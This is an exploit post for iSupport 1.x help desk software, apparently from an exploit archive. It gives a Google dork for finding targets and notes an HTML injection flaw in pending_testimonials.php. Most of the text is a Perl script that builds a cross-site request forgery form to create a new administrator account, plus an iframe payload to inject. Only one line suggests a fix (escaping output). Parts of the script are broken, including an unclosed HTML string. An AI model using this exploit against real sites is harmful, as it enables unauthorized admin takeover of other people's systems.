# Title: iSupport v1.x => Html Code injection to add admin
# Author : Or4nG.M4n
# Version: 1.x
# Homepage : http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"
# Homepage : http://www.idevspot.com/
# Thnks :
# +----------------------------------+
# | xSs m4n i-Hmx h311 c0d3|
# | Dr.Bnned ahwak2000 sa^Dev!L|
# +----------------------------------+
# html injection to add Admin
# vuln : pending_testimonials.php
#<tr bgcolor="#F9F9F9">
# <td width="100%"> <b>
# <?php echo $title;?>
# </b> <i>posted by</i> <b>
# <?php echo $name;?>
# </b> [ <a href="https://www.exploit-db.com/exploits/18404/<?php echo $website; ?>" target="_blank"><b>Website</b></a> ] <br>
# <i>
# <?php echo $body; ?>
# </i></td>
# <td>
# How i can Fixed ..
# in all vuln file
# Replace : echo $website; echo $title; echo $body; => Replace with => echo htmlspecialchars($website); like this ..
# Thnks to All Stupid Coders
| iSupport 1.x inject html to Add Admin|\n
|Or4nG.M4nsA^Dev!LxSs m4ni-Hmx |\n
Loading ...\n
print "tragt & path #";
$h = <STDIN>;
chomp $h;
print "User #";
$user = <STDIN>;
chomp $user;
print "Mail #";
$mail = <STDIN>;
chomp $mail;
print "Pass #";
$pass = <STDIN>;
chomp $pass;
$html = '<form name="xss" method="post" action= "'.$h.'/admin/function.php?which=ADMINISTRATORS&return=administrators&id=&t1=NAME&t2=EMAIL&t3=PASSWORD">
<input type="text" name="1" value="'.$user.'" size="30">
<input type="text" name="2" value="'.$mail.'" size="30">
<input type="text" name="3" value="'.$pass.'" size="30">
print "Createing ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
print "Createing Done .. \n";
print "Plz UPLOAD csrf.htm to your Site and Put's Url h3r3 #";
$csrf = <STDIN>;
chomp $csrf;
$done = '<iframe id="iframe" src="https://www.exploit-db.com/exploits/18404/'.$csrf.'" width="777" height="678"></iframe>';
print "NOW INJECT This Code \n";
print $done."\n";
print "";
print "\n Enjoy .. ";
# The End